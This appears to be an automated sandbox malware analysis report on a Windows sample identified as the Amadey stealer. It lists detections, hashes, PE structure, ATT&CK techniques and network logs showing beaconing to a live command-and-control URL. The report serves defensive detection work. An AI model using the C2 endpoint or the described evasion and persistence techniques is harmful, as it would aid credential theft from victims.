Code function: 10_2_002CCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

10_2_002CCB1A

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 10_2_002B65B0 LookupAccountNameA,

10_2_002B65B0

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 3.2.explorti.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.setup.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.explorti.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.explorti.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2228974412.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2724598095.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2189691685.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2188519642.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2184897638.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2230067978.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2141203577.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	224 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
setup.exe	62%	ReversingLabs	Win32.Spyware.Stealc
setup.exe	100%	Avira	TR/Crypt.TPM.Gen
setup.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	62%	ReversingLabs	Win32.Spyware.Stealc

Source	Detection	Scanner	Label
http://185.215.113.19/Vi9leo/index.php	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpt	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpN	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php8	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpC	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpa	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpr	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpo	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpm32	100%	Avira URL Cloud	phishing

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.php	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.phpo	explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpr	explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpa	explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpt	explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpC	explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php8	explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpm32	explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpN	explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.19	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483216
Start date and time:	2024-07-26 21:02:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@0/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target explorti.exe, PID 3384 because there are no executed function
Execution Graph export aborted for target explorti.exe, PID 4540 because there are no executed function
Execution Graph export aborted for target setup.exe, PID 4788 because it is empty
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: setup.exe

Simulations

Behavior and APIs

Time	Type	Description
15:04:02	API Interceptor	296260x Sleep call for process: explorti.exe modified
21:03:05	Task Scheduler	Run new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.19	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	LbMTyCFRzs.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	DHBIT8FeuO.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	RedLine	Browse	185.215.113.9
	file.exe	Get hash	malicious	RedLine	Browse	185.215.113.9
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16

Process:	C:\Users\user\Desktop\setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1971200
Entropy (8bit):	7.946985346283621
Encrypted:	false
SSDEEP:	24576:EbwZGWBF4JrhKAlbJm35/vewlxk52vrTmMbT1KALVQtGKDLltj7kXCUiE8lmEE3P:EGANKAlb0lv9YT8UGSL38XCD4EeAyr
MD5:	F6DCA815EB37C8AA9BA54C603624227B
SHA1:	4A2215C9B3D8125D176014D528BE0563AEF1979E
SHA-256:	E294F1B0EC3CFF802AAA8BE3FC47AA0C1A56CBDC644467503E5B30122954964D
SHA-512:	6DF5F2608B88170C32258150689123DE759694976BBFB063CD03CA646452BFD5BA97D3282DB83E9F138F3885627DF5437D2455765C3D93A28E860EC2972529CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f.............................`M...........@...........................M.....+.....@.................................W...k............................IM..............................IM..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...rylhmesc.....P2.....................@...ofvhckac.....PM.....................@....taggant.0...`M.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\explorti.job

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	data
Category:	dropped
Size (bytes):	306
Entropy (8bit):	3.4023095668768453
Encrypted:	false
SSDEEP:	6:JC/DZXaXUEZ+lX1cI1l6lm6tE9+AQy0l1Xkt0:JelaQ1cagQ9+nV1Ut0
MD5:	21BCCFF900B06609DDBD32FABEBC025E
SHA1:	385C611C5DD3BC51DD055D1B5D5DE776AC85D25C
SHA-256:	6A5AA44CB490E7F6FF0F75C8F2E87DDD85E4208879E4A147F4B9669181572ECB
SHA-512:	B033F8D1FA592B0C3ECA539D63FE392E0346D64292463F2DB399E2E2A0EF7137D472E1939A3A40AAFCCDDEBC821F9CEC7439797E25708DC0C2BCD7F6CE459993
Malicious:	false
Reputation:	low
Preview:	......]..F.B.,.[..i.F.......<... .....s.......... ....................=.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.946985346283621
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	setup.exe
File size:	1'971'200 bytes
MD5:	f6dca815eb37c8aa9ba54c603624227b
SHA1:	4a2215c9b3d8125d176014d528be0563aef1979e
SHA256:	e294f1b0ec3cff802aaa8be3fc47aa0c1a56cbdc644467503e5b30122954964d
SHA512:	6df5f2608b88170c32258150689123de759694976bbfb063cd03ca646452bfd5ba97d3282db83e9f138f3885627df5437d2455765c3d93a28e860ec2972529ca
SSDEEP:	24576:EbwZGWBF4JrhKAlbJm35/vewlxk52vrTmMbT1KALVQtGKDLltj7kXCUiE8lmEE3P:EGANKAlb0lv9YT8UGSL38XCD4EeAyr
TLSH:	3D953336BFF3A784DA78D579DBA783A242343F8254D0E9B9220CED57269368C11F146C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8d6000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FF32CE1433Ah
pslld mm3, qword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [0700000Ah], al
or al, byte ptr [eax]
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4d49f4	0x10	rylhmesc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4d49a4	0x18	rylhmesc
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2dc00	54258ab361f8bc636aa242941ca6d058	False	0.9998719262295082	data	7.983148121720557	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	062cf784405798c6c6c6b27af54a642b	False	0.578125	data	4.525251618976754	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2ba000	0x200	fb8c683a4538b15532602ca8955196a6	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rylhmesc	0x325000	0x1b0000	0x1afc00	48b65f631ae3c659ad22ec792367a9e0	False	0.9945997846699479	data	7.952696111098041	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ofvhckac	0x4d5000	0x1000	0x400	056e1d2bc10a84cb19f29948d0545599	False	0.779296875	data	6.1648949197117355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4d6000	0x3000	0x2200	37edd11d96dc034770b58ae0b27a4680	False	0.06215533088235294	DOS executable (COM)	0.7280935907816917	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4d4a04	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T21:03:46.242634+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	56718	40.127.169.103	192.168.2.6
2024-07-26T21:04:04.757321+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	56720	80	192.168.2.6	185.215.113.19
2024-07-26T21:04:09.346760+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	56724	80	192.168.2.6	185.215.113.19
2024-07-26T21:03:19.182564+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49713	40.127.169.103	192.168.2.6
2024-07-26T21:04:11.658713+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	56726	80	192.168.2.6	185.215.113.19
2024-07-26T21:04:10.475380+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	56725	80	192.168.2.6	185.215.113.19

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 21:04:03.892682076 CEST	56720	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:03.898041964 CEST	80	56720	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:03.898139954 CEST	56720	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:03.898607969 CEST	56720	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:03.904963970 CEST	80	56720	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:04.757033110 CEST	80	56720	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:04.757320881 CEST	56720	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:04.759771109 CEST	56720	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:04.773948908 CEST	80	56720	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:05.033510923 CEST	80	56720	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:05.033571005 CEST	56720	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:05.148601055 CEST	56720	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:05.148904085 CEST	56721	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:05.156003952 CEST	80	56721	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:05.156099081 CEST	80	56720	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:05.156151056 CEST	56720	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:05.156312943 CEST	56721	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:05.156424999 CEST	56721	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:05.163397074 CEST	80	56721	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:05.945589066 CEST	80	56721	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:05.945712090 CEST	56721	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:05.946383953 CEST	56721	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:05.951636076 CEST	80	56721	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:06.197446108 CEST	80	56721	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:06.197519064 CEST	56721	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:06.305057049 CEST	56721	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:06.305370092 CEST	56722	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:06.311151981 CEST	80	56722	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:06.311381102 CEST	56722	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:06.311816931 CEST	56722	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:06.312510967 CEST	80	56721	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:06.312650919 CEST	56721	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:06.319253922 CEST	80	56722	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:07.071187973 CEST	80	56722	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:07.071270943 CEST	56722	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:07.072134972 CEST	56722	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:07.077075005 CEST	80	56722	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:07.320554018 CEST	80	56722	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:07.320652962 CEST	56722	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:07.429774046 CEST	56722	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:07.429989100 CEST	56723	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:07.434978962 CEST	80	56723	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:07.435070992 CEST	56723	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:07.435200930 CEST	56723	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:07.438555002 CEST	80	56722	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:07.438597918 CEST	56722	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:07.440083027 CEST	80	56723	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:08.216475010 CEST	80	56723	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:08.216558933 CEST	56723	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:08.217242956 CEST	56723	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:08.222182035 CEST	80	56723	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:08.468384027 CEST	80	56723	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:08.468455076 CEST	56723	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:08.570339918 CEST	56723	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:08.570792913 CEST	56724	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:08.576010942 CEST	80	56724	185.215.113.19	192.168.2.6
Jul 26, 2024 21:04:08.576247931 CEST	56724	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:08.576247931 CEST	56724	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:04:08.576450109 CEST	80	56723	185.215.113.19	192.168.2.6
